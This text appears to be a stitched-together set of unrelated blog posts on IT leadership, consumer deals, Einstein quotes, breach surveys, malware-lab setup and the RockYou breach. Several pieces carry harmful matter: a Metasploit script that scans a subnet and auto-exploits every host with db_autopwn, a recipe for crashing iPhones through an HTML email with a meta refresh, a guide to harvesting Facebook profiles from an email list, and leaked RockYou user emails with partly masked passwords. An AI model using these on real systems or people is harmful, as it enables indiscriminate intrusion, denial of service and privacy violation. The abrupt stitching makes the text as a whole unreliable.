There’s more than a few non-technical hurdles we have to jump over. Consider these scenarios as a for instance.

A C level executive wants to push a project through – you as the senior IT executive cannot sign off on the release until some sanity checks are done, but the C level releases anyway.
A senior executive refuses to implement controls because it will add complexity to the project – yet the controls are required by the industry.
These aren’t insurmountable issues but are just a couple of the hoops we have to jump through. The point here isn’t to have answers to the above issues, but to show that the art (see title) is not only being a leader in the technical field, a mentor to technical staff and all the other attributes of a senior IT executive, but also to deal with the personalities of those above you – managing your managers so to speak.

Should it be this way? No, not really but it’s not a perfect world we live in. If we can’t communicate at all levels we are in the wrong job. If we can’t make these people see reason all we can do is inform them of the risk. Since it’s our neck on the line when things go awry we need to make sure all bases are covered. Even if we are right we cannot afford to make any part of the business look bad so it becomes a strategic issue, but is that really where we want to go with this, or where we need to be? If we have tried all avenues and we are still not being heard – perhaps the business isn’t ready for a senior executive in the IT leadership role. That’s a hard truth and also a tough call.

We’ve seen the IT role move from being a customer organization to a business partner, and rightfully so. Look how long it took to do that. In the age of ever advancing technology does everyone realize that the business will not function without IT? That’s a rhetorical question but the excuse of not knowing what IT does isn’t going to cut it anymore. Should we explain the complexity of our environment to everyone, or should we be seen as the enabling business partner that drives the business forward from the proper use of technology?

This isn’t a rant by the way. It’s attempting to realize something that I have been working with for a long time. IT has value to the business and is a business partner. We know IT is not revenue generating but we should not be seen as a drain on assets, or a department that spends for the sake of spending. We have to trust that our IT executives know what they are doing, just as you would trust a CEO or COO that they know what they are doing, and accept that you cannot know all about everything that we do. (yes, I meant to write that sentence that way!). Superseding and second guessing our world is not going to help the business, in fact more often than not it will hurt the business.

As with everything there are many points of view pertaining to this topic. I’ve read many on the CIO forums and LinkedIn noticeboards, and I’ve heard many when speaking at conferences and attending seminars. But what I feel the most is, we as leaders can say the words “they don’t understand”. If that is where we leave it we don’t deserve to be leaders. We have to stand up and bridge the gap. For example, in the role of information security some say “the execs will get it when we get hacked, then we’ll get the money”. That’s a little too late for my liking. In that case I will take drastic measures to protect the business, that might include hacking the company myself. I would rather it be me that breaches the company than a hacker, and if done correctly it will have the desired effect. That will also add to your credence as a leader and more trust will start to flow. That being said there is a chance it could backfire. Not everyone can accept a direct approach like that.

I can go around in circles on this one, but I’ll leave it here for now. This isn’t meant as a blue print or guideline. It is meant to provoke thought and point of view and I fully understand that there are those that will push back hard – and that is good too. Care to share your thoughts? I’d love to hear them.

Here’s a link to Core Labs presentation: WPA Migration Mode: WEP is back to haunt you…

The OWASP Top 10 Web Application Security Risks for 2010 are:
–Code Injection
–Cross-Site Scripting (XSS)
–Broken Authentication and Session Management
–Insecure Direct Object References
–Cross-Site Request Forgery (CSRF)
–Security Mis-configuration
–Insecure Cryptographic Storage
–Failure to Restrict URL Access
–Insufficient Transport Layer Protection
–Un-validated Redirects and Forwards

The full descriptions are well worth reading, and further down the page there are “factors” broken out into four headings. Again, there is more information on the OWASP website, but look at the four headings below. This is a really easy way to help you classify the severity of potential threats, and to help you asses your assumption of risk.

Threat factors – skill level, motive, opportunity, size

Vulnerability factors – ease of discovery, ease of exploit, awareness, IDS

Technical impact factors – loss of confidentiality, integrity, availability, accountability

Business impact factors – financial damage, reputation, non-compliance, privacy violation

…worth sharing I thought!

See for yourself HERE!

Big discounts! Big sales! Big freebies! Enticing deals abound, but you need to distinguish those from the raw deals masquerading as bargains. Many of them come with so many strings attached that they could cost you plenty. (Those frequent-flier rewards cards, for example? They often cost you a bundle — and the airline miles are often more restrictive and harder to use than what you’d get from a cash-back credit card.)

For consumers, a little homework goes a long way. Here are eight would-be deals to steer clear of, as well as our suggestions for better options.

1. Unlimited Long Distance

Many telephone plans bundle “free” unlimited long-distance service with local calling service. If you don’t make a lot of long-distance calls — or if you make a lot of them from your cell phone — these plans may not be cost effective. A bundled plan typically costs about $20 more than a local plan, but the average American consumer makes fewer than two hours of long-distance phone calls a month, according to the Federal Communications Commission. That’s about 17 cents per minute.

Better Deal: Skip the extra fees, and buy your long-distance service from a reseller such as ECG or Pioneer Telephone. These companies buy their long-distance service wholesale from the larger telecommunications firms but offer the same general quality for far lower prices, billing by the minute or fraction thereof. (ECG charges 2.5 cents a minute for interstate phone calls; Pioneer’s price is 2.7 cents.)

Alternately, sign up for a voice over Internet protocol (VoIP) plan from a carrier like Vonage, whose plans start at $15 a month (climbing to $26 after a six-month trial) for both local and long distance. Calls travel over the Internet, though, so you need a stable, active cable or DSL Internet connection for this to work.

2. Frequent-Flier Rewards Cards

Credit card rewards tied to airline miles or gift points were the earliest players in the sector, but it’s time to dump them. For one thing, the benefits have shrunk, particularly on airlines: They’ve increased the number of miles needed for a free flight; reduced flight schedules, making free seats harder to find; and, in some cases, imposed a booking fee on rewards flights.

On certain rewards cards, annual fees may also outweigh the benefits. The perks-laden American Express Platinum, which costs $450 a year, offers a complimentary airline ticket for every first- or business-class fare purchased on select international flights, plus a business-class fare purchased on plus a concierge service, free access to airport lounges, and other bonuses. It all sounds great, especially if you are booking lots of international business-class travel. But if not, you just paid $450 to have someone else make your restaurant reservations.

Better Deal: Try cash-reward cards instead. Airline miles and gifts are fine, but if you have the cash in your wallet, you can make your own purchasing decisions. Peter Flur of Credit Card Goodies, a 10-year-old Web site that monitors rewards cards, recommends Blue Cash from American Express, which offers up to 5 percent cash back on purchases at gas, groceries, and drugstores, as well as 1.25 percent on all other purchases once a cardholder rings up $6,500 in purchases any given year.

3. Checking Accounts That Pay Interest

Interest-bearing checking accounts at traditional brick-and-mortar banks often pay only 0.13 percent interest but require high minimums to avoid a monthly maintenance fee. On, for instance, a deposit of $3,400 — the average minimum required to avoid monthly fees, according to Bankrate.com data — that amounts to just $4.42 in annual interest.

Better Deal: In this low-interest environment, forget about getting any interest from your checking account, advises Richard Barrington, an analyst with MoneyRates.com. Instead, look for a no-fee checking account — and “be sure to check the minimum balance requirement,” Barrington says. “These minimums have been rising, so make sure it’s a minimum balance you can realistically maintain.”

Meanwhile, if you have extra cash, shop around for banks and credit unions that offer good deals. Mike Moebs, an economist whose firm surveys bank fees says there are a few banks and credit unions that combine checking and money-market deposit accounts into one, offering a high rate on balances over $2,500.

4. Overdraft Protection

Many banks used to offer it automatically when you opened an account, making it sound like a valuable safeguard. After all, if you bounced a check or tried to withdraw more cash from the ATM than you had in your account, you wouldn’t suffer any embarrassment when the bank refused to process a transaction.

But consumer advocates long argued that overdraft protection was just a way for banks to earn money at your expense, charging $20 to $35 per overdraft — a substantial penalty, considering the typical transaction prompting the overdraft fee is $20. That’s why the government has ordered new rules to take effect this summer that will require banks to get your approval before enrolling you in overdraft protection.

Better Deal: If you want back-up protection without the overdraft fees, consider setting up a savings account linked to your checking account so funds can be transferred in case of an overdraft. There may still be a fee to transfer funds between accounts, but it’s typically lower — only $10.

Meanwhile, keep a careful tab on your bank account balance: If you opt out of overdraft protection and then make an ATM or debit-card transaction that exceeds your balance, your transaction could be denied.

5. Extended-Warranty Protection

Don’t buy additional warranty coverage for electronics and major appliances. For one thing, some repairs are already covered by the standard manufacturer warranty. And Consumer Reports’ researchers have found that products seldom break within the extended-warranty window — and that when electronics and appliances do break, average repair costs are about as much as an extended warranty.

Better Deal: Check the fine print on your existing Visa, MasterCard or American Express. Many of these cards, particularly if they are platinum or gold, will extend the warranty for a year. “It’s one of the greatest freebies from credit card companies ever,” says Edgar Dworsky, a consumer lawyer and founder of the Consumer World Web site. The warranty protection varies, so review the policies on your existing cards before you make a purchase — then use the one offering the best warranty protection.

6. Going-Out-of-Business Sales

They don’t offer the bargains you’d expect — at least at the outset, when the promoted discounts are usually off the full retail price. That “30 percent off” sale may not be any better than the deals you could get before the liquidation process started. In some cases, you may actually be better off buying from a rival store that is trying to compete with the bankrupt retailer — and will be around to take care of any problems after the liquidating store is out of business.

Better Deal: Shopping robots, such as PriceGrabber.com and Shopping.com, are good places to comparison shop and may be particularly useful before visiting any liquidation sale, says Dworsky. One of his favorite sites, PriceSpider.com, posts historical prices; the range of prices should help you determine whether the price is likely to hold or continue to drop.

7. Paying for a Credit Report

Despite its name, FreeCreditReport.com is not gratis. Here’s what the fine print really says: Order your free report and you get a seven-day free trial membership in a credit-monitoring service. If you don’t cancel within seven days, you’ll be billed $14.95 a month until you bail out. Be wary of other sites making similar come-ons.

Better Deal:Visit AnnualCreditReport.com instead — the government-approved Web site where you can get a free credit report from each of the three major credit bureaus once a year. It won’t give you your actual credit score, but most people don’t need it. (The exception: If you’re actively shopping for a loan right now, go to myFICO.com to get your current score — and a report from Equifax or TransUnion — for $16.)

If you’re merely curious about how lenders perceive your credit record, you can get a good estimate of your credit score for free at CreditKarma.com. You can also try the credit score estimator at Credit.com; you will probably need your actual credit report to answer some of the site’s key questions, such as the age of your oldest credit account and the number of outstanding loans and credit cards.

8. Fraud Alerts

Don’t pay for identity-theft-protection services that automatically put fraud alerts on your credit report. You can do that yourself; it’s easy — and free. But be careful: Don’t put a fraud alert on your credit report as a general matter, because that means you can’t easily open new accounts. You should use fraud alerts only if you’ve had your wallet stolen or something else has happened to put you at real risk.

Better Deal: Review your monthly credit card and bank statements regularly to make sure there are no unauthorized charges. Also, don’t forget to obtain a copy of your free credit report annually from each of the three major credit bureaus — using AnnualCreditReport.com, of course.

Einstein has made great contributions to the scientific world, including the theory of relativity, the founding of relativistic cosmology, the prediction of the deflection of light by gravity, the quantum theory of atomic motion in solids, the zero-point energy concept, and the quantum theory of a monatomic gas which predicted Bose–Einstein condensation, to name a few of his scientific contributions.

Einstein received the 1921 Nobel Prize in Physics “for his services to Theoretical Physics, and especially for his discovery of the law of the photoelectric effect.”

He’s published more than 300 scientific works and over 150 non-scientific works. Einstein is considered the father of modern physics and is probably the most successful scientist there ever was.

10 Amazing Lessons from Albert Einstein:

1. Follow Your Curiosity

“I have no special talent. I am only passionately curious.”

What piques your curiosity? I am curious as to what causes one person to succeed while another person fails; this is why I’ve spent years studying success. What are you most curious about? The pursuit of your curiosity is the secret to your success.

2. Perseverance is Priceless

“It's not that I'm so smart; it's just that I stay with problems longer.”

Through perseverance the turtle reached the ark. Are you willing to persevere until you get to your intended destination? They say the entire value of the postage stamp consist in its ability to stick to something until it gets there. Be like the postage stamp; finish the race that you’ve started!

3. Focus on the Present

“Any man who can drive safely while kissing a pretty girl is simply not giving the kiss the attention it deserves.”

My father always says you cannot ride two horses at the same time. I like to say, you can do anything, but not everything. Learn to be present where you are; give your all to whatever you’re currently doing.

Focused energy is power, and it’s the difference between success and failure.

4. The Imagination is Powerful

“Imagination is everything. It is the preview of life's coming attractions. Imagination is more important than knowledge.”

Are you using your imagination daily? Einstein said the imagination is more important than knowledge! Your imagination pre-plays your future. Einstein went on to say, “The true sign of intelligence is not knowledge, but imagination.” Are you exercising your “imagination muscles” daily, don’t let something as powerful as your imagination lie dormant.

5. Make Mistakes

“A person who never made a mistake never tried anything new.”

Never be afraid of making a mistake. A mistake is not a failure. Mistakes can make you better, smarter and faster, if you utilize them properly. Discover the power of making mistakes. I’ve said this before, and I’ll say it again, if you want to succeed, triple the amount of mistakes that you make.

6. Live in the Moment

“I never think of the future - it comes soon enough.”

The only way to properly address your future is to be as present as possible “in the present.”

You cannot “presently” change yesterday or tomorrow, so it’s of supreme importance that you dedicate all of your efforts to “right now.” It’s the only time that matters, it’s the only time there is.

7. Create Value

“Strive not to be a success, but rather to be of value."

Don’t waste your time trying to be successful, spend your time creating value. If you’re valuable, then you will attract success.

Discover the talents and gifts that you possess, learn how to offer those talents and gifts in a way that most benefits others.

Labor to be valuable and success will chase you down.

8. Don’t Expect Different Results

“Insanity: doing the same thing over and over again and expecting different results.”

You can’t keep doing the same thing everyday and expect different results. In other words, you can’t keep doing the same workout routine and expect to look differently. In order for your life to change, you must change, to the degree that you change your actions and your thinking is to the degree that your life will change.

9. Knowledge Comes From Experience

“Information is not knowledge. The only source of knowledge is experience.”

Knowledge comes from experience. You can discuss a task, but discussion will only give you a philosophical understanding of it; you must experience the task first hand to “know it.” What’s the lesson? Get experience! Don’t spend your time hiding behind speculative information, go out there and do it, and you will have gained priceless knowledge.

10. Learn the Rules and Then Play Better

“You have to learn the rules of the game. And then you have to play better than anyone else.”

To put it all in simple terms, there are two things that you must do. The first thing you must do is to learn the rules of the game that you’re playing. It doesn’t sound exciting, but it’s vital. Secondly, you must commit to play the game better than anyone else. If you can do these two things, success will be yours!

Thank you for reading and be sure to pass this article along!

Social Engineering Toolkit – Website Attack How To

As with all things “hack” – be careful how you proceed. The opportunity to hack is always there – the ability to show constraint and remain ethical is a necessity! ‘Nuff said.

Enjoy.

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

Have fun with it.

I have tested the following on two separate iPhones and it caused crashes on them both. I don’t have an iPhone of my own to test with, so I’m not able to investigate this much further.

1.) Create a blank file named anything.txt and then upload it to some webspace. It needs to be completely blank… 0 bytes. It must be served as text/plain. At least, “text/plain” is the only content type I know for sure it works with as I didn’t try any others.

2.) Send an HTML email to an email account that the iPhone can access. The HTML email must contain a meta refresh tag to the file which you have just created. Example:

<head>
<meta http-equiv="Refresh" content="1; URL=http://EXAMPLE/anything.txt"/>
</head>

3.) Open the email on an iPhone.

The iPhone email client actually honours the meta refresh and attempts to load the URL. It then proceeds to crash. Next time you open the email client it will have to re-sync all of the email.

This information comes with no warranty. Use it only for good, and only on your own phone.

By Joan Goodchild, Senior Editor

Companies continue to pay a high price to clean up the mess created by a data breach, but having a Chief Information Security Officer (CISO) may offer some protection. That is the conclusion of a study released Monday by the Ponemon Institute, a Michigan-based consultancy that conducts independent research on privacy, data protection and information security policy.

This is the fifth year Ponemon has conducted its “Cost of a Data Breach” survey, which examined actual data breach experiences of 45 U.S. companies from 15 different industry sectors. This year, the cost of a data breach has increased to $204 from last year’s $202 per customer record. However, companies that had a CISO (or equivalent title) who managed the data breach incident experienced an average per capita cost of $157 versus $236 for companies without such CISO leadership.

Approximately 40 percent of participating companies had a CISO in charge of managing the data breach incident, according to the survey.

“While other functional areas are typically involved in crisis management activities surrounding the data breach, our results suggest CISO leadership substantially reduces the overall cost of data breach,” the report states.

“The one big take away on positive takeaway is that in (companies) that have CISO involvement, breaches tend to cost less because they have a more strategic view of protecting data than the old idea of whack-a mole, fix-it a hundred different times, ” explained Phillip Dunkelberger, president and CEO of PGP Corp., which co-sponsored the study. “CISO involvement at a higher level means less cost of a data breach and less chance of repeating it because of the strategic view of protecting it that these professional take.”

While the cost of a breach only rose two dollars per record this year, Dr. Larry Ponemon, founder and chair of the Ponemon Institute, pointed out the massive increase in cost over the five years since the study’s inception, when breaches cost $138 per compromised customer record. In figuring out the costs, the study takes into account a wide range of business costs, including expense outlays for detection, escalation, notification, and after the fact (ex-post) response. The economic impact of lost or diminished customer trust and confidence, measured by customer churn or turnover rates, is also analyzed.

Other highlights from this year’s research include:
- Forty two percent of all cases in this year’s study involved third-party mistakes or flubs. Data breaches involving outsourced data to third parties, especially when the third party is offshore, are most costly. The per capita cost for data breaches involving third parties is $217 versus $194, more than a $21 difference, according to Ponemon.

-Twenty four percent of all cases in this year’s study involved a malicious or criminal attack that resulted in the loss or theft of personal information. Research shows data breaches involving malicious or criminal acts are much more expensive than incidents resulting from negligence. The per capita cost of a data breach involving a malicious or criminal act averages $215. The per capita cost of a data breach involving a negligent insider or a systems glitch averages $154 and $166, respectively.

-Thirty six percent of all cases in this year’s study involved lost or stolen laptop computers or other mobile data-bearing devices. Data breaches concerning lost, missing or stolen laptop computers are more expensive than other incidents. Specifically, in this year’s study the per victim cost for a data breach involving a lost or stolen laptop is $225.

“Its not just about bad guys, but also good guys who make mistakes,” noted Ponemon.

By Bill Brenner, Senior Editor, CSO Online

Companies have spent many millions of dollars to build defenses around their IT assets this past decade, motivated by malware attacks, data security breaches and the resulting regulatory compliance cattle prod.

But the bad guys are still a few steps ahead in terms of sophistication and speed and some wonder if their investments were all for nothing, according to the newly-released 2010 Cyber Security Watch Survey.

More than 500 respondents, including business and government executives, professionals and consultants, participated in the survey, conducted by CSO Magazine with help from the U.S. Secret Service, Carnegie Mellon Software Engineering Institute (CERT) and Deloitte’s Center for Security and Privacy Solutions. Though respondents point to sizable efforts to keep their companies secure, many admit it’s getting almost impossible to outpace the bad guys.
Also see Network Security: The Basics

“Security confidence seems to be waning. Respondents are spending more money and implementing new capabilities, but overall they seem to be unsure about how truly effective their efforts really are toward ensuring security,” said Ted DeZabala, principal at Deloitte & Touche LLP and U.S. leader of Deloitte’s Security & Privacy services.

The survey showed a drop in cybercrime victims — 60 percent this year compared to 66 percent in 2007. But the affected organizations have experienced significantly more attacks than in previous years, fueling doubts over a lack of return-on-investments (ROI).

Between August 2008 and July 2009 more than a third (37 percent) of respondents experienced an increase in cybercrimes compared to the previous year. While outsiders (non-employees or contractors) are the main culprits of cybercrime in general, the most costly or damaging attacks are more often caused by insiders (employees or contractors). One quarter of all cybercrime attacks were committed by an unknown source.

Although the number of incidents rose, the ramifications have not been as severe. Since 2007, when the last cybercrime survey was conducted, the average monetary value of losses resulting from cybercrimes declined by 10 percent. This can likely be attributed to an increase in both IT security spending (42 percent) and corporate/physical security spending (86 percent) over the past two years.

And yet, as technology advances, so do the attack methods, and many respondents worry that the bad guys are still winning. Outsiders invade organizations with viruses, worms or other malicious code; phishing; and spyware, while insiders most commonly expose private or sensitive information unintentionally, gain unauthorized access to/use of information systems or networks, and steal intellectual property.

The survey finds that insiders most often use their laptops or copy information to mobile devices as a means to commit electronic crimes against their organization. Respondents suggested data is often downloaded to home computers or sent outside the business via e-mail. This may lead to damaged reputations and may put organizations in violation of state or federal data protection laws.

More than half of the respondents — 58 percent — do believe they are more prepared to prevent, detect, respond to or recover from a cybercrime incident compared to the previous year. But only 56 percent have a plan for reporting and responding to an incident.

The research also indicated that businesses are trying to take steps to identify insider threats. Nearly one-third (32 percent) now monitor the online activities of employees who may be disgruntled or who have turned in their resignations.

Dawn Cappelli, technical manager for the Threat and Incident Management division of the Software Engineering Institute CERT Program, said insider attacks continue to be seen as a bigger problem than anything that might come from the outside.

“Attacks are more costly than outside attacks, and seven of the top eight practices that were indicated as being most effective at prevention, detection and deterrence apply to employees,” she said.

Though many respondents may be doubting the ROI of their security investments, the activity to deal with the insider threat at least indicates that no one is thinking about tightening up on their spending. Perhaps that’s because many feel like they have no choice but to keep spending, lest they fall even further behind the bad guys.

“This looks like good news — they have found effective practices for handling the most costly threats,” Cappelli said. “However, the technical solutions for insider threat mitigation were ranked alarmingly low: DLP, Ranked 9th least effective and change control/configuration management systems, ranked 5th least effective. In addition, account audits are only being performed by 43 percent of respondents, probably because of the technology gap.

To that end, her parting advice is not to the respondents, but to the vendor community: Come up with something better to help customers achieve the DLP and change control/configuration management they need.

A LARGE NUMBER of computer intrusions involve some form of malicious software (malware), which finds its way to the victim’s workstation or to a server. When investigating the incident, the IT responder typically seeks to answer questions such as: What actions can the malware specimen perform on the system? How does it spread? How, if at all, does it maintain contact with the attacker? These questions can all be answered by analyzing the offending malware in a controlled environment.

A simple analysis toolkit, built from free and readily available software, can help you and your IT team develop the skills critical to responding to today’s security incidents. The steps below will help get you started. We’ll focus on malware analysis in a Windows environment, since that platform is particularly popular among malware authors.

Step 1: Allocate physical or virtual systems for the analysis lab

A common approach to examining malicious software involves infecting a system with the malware specimen and then using the appropriate monitoring tools to observe how it behaves. This requires a laboratory system you can infect without affecting your production environment.

The most popular and flexible way to set up such a lab system involves virtualization software, which allows you to use a single physical computer for hosting multiple virtual systems, each running a potentially different operating system. Free virtualization software options include:

• VMware Server
• Windows Virtual PC
• Microsoft Virtual Server
• VirtualBox

Running multiple virtual systems simultaneously on a single physical computer is useful for analyzing malware that seeks to interact with other systems, perhaps for leaking data, obtaining instructions from the attacker, or upgrading itself. Virtualization makes it easy to set up and use such systems without procuring numerous physical boxes.

Another useful feature of many virtualization tools is the ability to take instantaneous snapshots of the laboratory system. This way, you can record the state of the system before you infect it, and revert to the pristine environment with a click of a button at the end of your analysis.

If using virtualization software, install as much RAM into the physical system as you can, as the availability of memory is arguably the most important performance factor for virtualization tools. In addition, having a large hard drive will allow you to host many virtual machines, whose virtual file systems typically are stored as files on the physical system’s hard drive.

Take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape.

Because malware may detect that it’s running in a virtualized environment, some analysts prefer to rely on physical, rather than virtual, machines for implementing laboratory systems. Your old and unused PCs or servers can make excellent systems for your malware-analysis lab, which usually doesn’t need high-performing CPUs or highly redundant hardware components.

To allow malware to reach its full potential in the lab, laboratory systems typically are networked with each other. This helps you observe the malicious program’s network interactions. If using physical systems, you can connect them with each other using an inexpensive hub or a switch.

Step 2: Isolate laboratory systems from the production environment

You must take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape. You can separate the laboratory network from production using a firewall. Better yet, don’t connect laboratory and production networks at all, to avoid firewall configuration issues that might allow malware to bypass filtering restrictions.

If your laboratory network is strongly isolated, you can use removable media to bring tools and malware into the lab. It’s best to use write-once media, such as CDs, to prevent malicious software from escaping the lab’s confines by writing itself to a USB key. If using a USB key, which is more convenient than a CD, get a model that includes a physical write-protect switch.

Some malware-analysis scenarios benefit from the lab being connected to the internet. Avoid using the production network for such connectivity. If possible, provision a separate, and usually inexpensive, internet connection, perhaps by dedicating a DSL line to this purpose. Avoid keeping the lab connected to the internet all the time to minimize the chance of malware in your lab attacking someone else’s system on the internet.

If virtualizing your lab, be sure to keep up with security patches released by the virtualization-software vendor. Such software may have vulnerabilities that could allow malware to escape from the virtual system you infected and onto the physical host. Furthermore, don’t use the physical machine that’s hosting your virtualized lab for any other purpose.

Step 3: Install behavioral analysis tools

Before you’re ready to infect your laboratory system with the malware specimen, you need to install and activate the appropriate monitoring tools. Free utilities that will let you observe how Windows malware interacts with its environment include:

• File system and registry monitoring: Process Monitor and Capture BAT offer a powerful way to observe in
  real time how local processes read, write, or delete
  registry entries and files. These tools can help you
  understand how malware attempts to embed into the
  system upon infection.
• Process monitoring: Process Explorer and Process Hacker replace the built-in Windows Task Manager, helping
  you observe malicious processes, including local network
  ports they may attempt to open.
• Network monitoring:Wireshark and SmartSniff are
  network sniffers, which can observe laboratory network
  traffic for malicious communication attempts, such as
  DNS resolution requests, bot traffic, or downloads.
• Change detection: Regshot is a lightweight tool for comparing the system’s
  state before and after the infection, to highlight
  the key changes malware made to the file system and
  the registry.

Behavioral monitoring tools can give you a sense for the key capabilities of malicious software. For further details about its characteristics, you may need to roll up your sleeves and perform some code analysis.

Step 4: Install code-analysis tools

Examining the code that comprises the specimen helps uncover characteristics that may be difficult to obtain through behavioral analysis. In the case of a malicious executable, you rarely will have the luxury of access to the source code from which it was created. Fortunately, the following free tools can help you reverse compiled Windows executables:

• Disassembler and debugger: OllyDbg and IDA Pro Freeware can parse compiled Windows
  executables and, acting as disassemblers, display their
  code as Intel x86 assembly instructions. These tools
  also have debugging capabilities, which allow you to
  execute the most interesting parts of the malicious program
  slowly and under highly controlled conditions, so
  you can better understand the purpose of the code.
• Memory dumper: LordPE and OllyDump help obtain protected code located in the
  lab system’s memory and dump it to a file. This technique
  is particularly useful when analyzing packed executables,
  which are difficult to disassemble because
  they encode or encrypt their instructions, extracting
  them into RAM only during run-time.

Step 5: Utilize online analysis tools

To round off your malware-analysis toolkit, add to it some freely available online tools that may assist with the reverse engineering process. One category of such tools performs automated behavioral analysis of the executables you supply. These applications look similar at first glance, but use different technologies on the back end. Consider submitting your malware specimen to several of these sites; depending on the specimen, some sites will be more effective than others. Such tools include:

• Anubis
• CWSandbox
• Joebox
• Norman SandBox
• ThreatExpert

Another set of potentially useful online tools provides details about websites that are suspected of hosting malicious code. Some of these tools examine the sites you specify in real time; others provide historical information. Consider submitting a suspicious URL to several of these sites, because each may offer a slightly different perspective on the website in question:

• Real-time threat assessment: Finjan URL Analysis, McAfee Site
  Advisor, and Wepawet
• Historical reputation data: Norton Safe Web
  and WOT (Web of Trust)

Next Steps

With your initial toolkit assembled, start experimenting in the lab with malware you come across on the web, in your e-mail box, on your systems, and so on. You may find this one-page cheat sheet convenient.

Begin analysis with the tools and approaches most familiar to you. Then, as you become more familiar with the inner workings of the malware specimen, venture out of your comfort zone to try other tools and techniques. The tools I’ve listed within each step operate virtually identically. Since they’re all free, you should feel free to try them all. You’ll find that one tool will work better than another, depending on the situation. And with time, patience, and practice, you will learn to turn malware inside out.

So you have somehow begged, borrowed or stolen an email list of 1000 users who you believe are interested in your new service. Would it not be great if you could somehow convert that list into real people, with real photos, and perhaps even more concrete information like “My service has a higher than average gay consumer group” or “My dating service seems to be very popular among 9 year old girls”? Such information can help you correct course before you are too invested in a particular idea you have.

Well, a few weeks back, we were handed down this lovely present by our masters from above: Facebook. Save your email list as a CSV file (just comma separate those email addresses). Upload this file to your facebook account as if you wanted to add them as friends. Voila, facebook will give you all the profiles of all those users (in my test, about 80% of my email lists have facebook profiles). Now, click through each profile, and because of the new default facebook settings, which makes all information public, about 95% of the user info is available for you to harvest.

If your email list is too large, then use the very same CSV file and upload it to mechanical turk (a list of 10.000 would cost you about $10), and ask the mechanical turk guys to gather this information for you.

After you have all the demographic information you want, try to do good with it. My personal advice to facebook users: Switch on your privacy settings, make your friendslist private. Business want this information, and facebook has given it to them.

Update (from a reddit comment): Use this URL http://www.facebook.com/search/?ref=ffs&q=name@domain.com&o=2048&init=ffs and screenscrape for even more spammy goodness.

Earlier today news spread that social application site RockYou had suffered a data breached that resulted in the exposure of over 32 Million user accounts. To compound the severity of the security breach, it was found that RockYou are storing all user account data in plain text in their database, exposing all that information to attackers. RockYou have yet to inform users of the breach, and their blog is eerily silent – but the details of the security breach are going from bad to worse.

The first issue is that RockYou attempted to downplay the entire incident, first by covering it up by not notifying users and then downplaying it in an official statement as being an issue that only affected ‘older’ applications. The hacker responsible for the initial breach published a small portion of the dataset he had retrieved and was able to show that not only did he have access to their entire database, but also passwords were stored in the clear. This matter now appears worse than originally suspected as the dataset also contains a table where RockYou have stored user credentials for social networks and other partner sites.

The database consists of a table containing partner data, and another table that has stored the credentials for those partner sites that users have entered. This includes social networks such as MySpace but also webmail accounts.

Data UserAccount [32603388]
================
1|jennaplanerunner@hotmail.com|mek*****|myspace|0|bebo.com
2|phdlance@gmail.com|mek*****|myspace|1|
3|jennaplanerunner@gmail.com|mek*****|myspace|0|
5|teamsmackage@gmail.com|pro*****|myspace|1|
6|ayul@email.com|kha*****|myspace|1|tagged.com
7|guera_n_negro@yahoo.com|emi*****|myspace|0|
8|beyootifulgirl@aol.com|hol*****|myspace|1|
9|keh2oo8@yahoo.com|cai*****|myspace|1|
10|mawabiru@yahoo.com|pur*****|myspace|1|
11|jodygold@gmail.com|att*****|myspace|1|
12|aryan_dedboy@yahoo.com|iri*****|myspace|0|
13|moe_joe_25@yahoo.com|725*****|myspace|1|
14|xxxnothingbutme@aol.com|1th*****|myspace|0|
15|meandcj069@yahoo.com|too*****|myspace|0|
16|stacey_chim@hotmail.com|cxn*****|myspace|1|
17|barne1en@cmich.edu|ilo*****|myspace|1|
18|reo154@hotmail.com|ecu*****|myspace|1|
19|natapappaslie@yahoo.com|tor*****|myspace|0|
20|ypiogirl@aol.com|tob*****|myspace|1|
21|brittanyleigh864@hotmail.com|bet*****|myspace|1|myspace.com
22|topenga68@aol.com|che*****|myspace|0|
23|marie603412@yahoo.com|cat*****|myspace|0|
24|mellowchick41@aol.com|chu*****|myspace|0|
25|baiko0o@aol.com|may*****|myspace|0|
26|indahamzah84@hotpop.com|lov*****|myspace|0|

The initial exploit took advantage of a trivial SQL injection vulnerability, a technique that has been well documented for over a decade. The method of vulnerability is extremely basic in execution, yet catastrophic in impact – which RockYou, and the sites users, are now learning the hard way. It is more of a surprise that this had not happen sooner – as the RockYou platform is a swiss cheese of security vulnerabilities and poor practices.

Where RockYou Went Wrong

Poor password policies

RockYou account creation only enforced password of a minimal length of 5 characters, there was no requirement for mixed-case, numbers or punctuation. The platform actually encouraged simple passwords by not allowing any punctuation at all.

Passwords in the clear

RockYou are still storing passwords in the clear, and transporting user passwords in the clear via email. Despite the attack taking place over 10 days ago now and RockYou knowing about the attack, a user signing up for a RockYou account today will still have their password stored as plain text and emailed to them in the clear.

The password anti-pattern

RockYou prompted users to enter their third-party site credentials directly into the RockYou site when sharing data or an application. The Facebook integration requires proper Facebook authentication, and MySpace integration today applies similar techniques, but for most of the other sites the same old crazy password request form is still present. Telling your users that you will not store their password is not a solution.

Terrible Response

RockYou knew about the breach days ago, and it took a taunt from the hacker for the issue to become well-known and for RockYou to issue a response (although their users are still not aware of the issue, unless they are reading the news online).

The sites privacy policy and the related ’security’ section state:

Our Commitment To Data Security:
RockYou! uses commercially reasonable physical, managerial, and technical safeguards to preserve the integrity and security of your personal information. We cannot, however, ensure or warrant the security of any information you transmit to RockYou! and you do so at your own risk. Once we receive your transmission of information, RockYou! makes commercially reasonable efforts to ensure the security of our systems. However, please note that this is not a guarantee that such information may not be accessed, disclosed, altered, or destroyed by breach of any of our physical, technical, or managerial safeguards.

If RockYou! learns of a security systems breach, then we may attempt to notify you electronically so that you can take appropriate protective steps. RockYou! may post a notice on the RockYou! Sites if a security breach occurs. Depending on where you live, you may have a legal right to receive notice of a security breach in writing. To receive a free written notice of a security breach (or to withdraw your consent from receiving electronic notice) you should notify us using this contact form.

Next time you sign up for a web service, take a moment to see where they stand on informing their users on a data breach, and find out just how much they respect the privacy of their users.

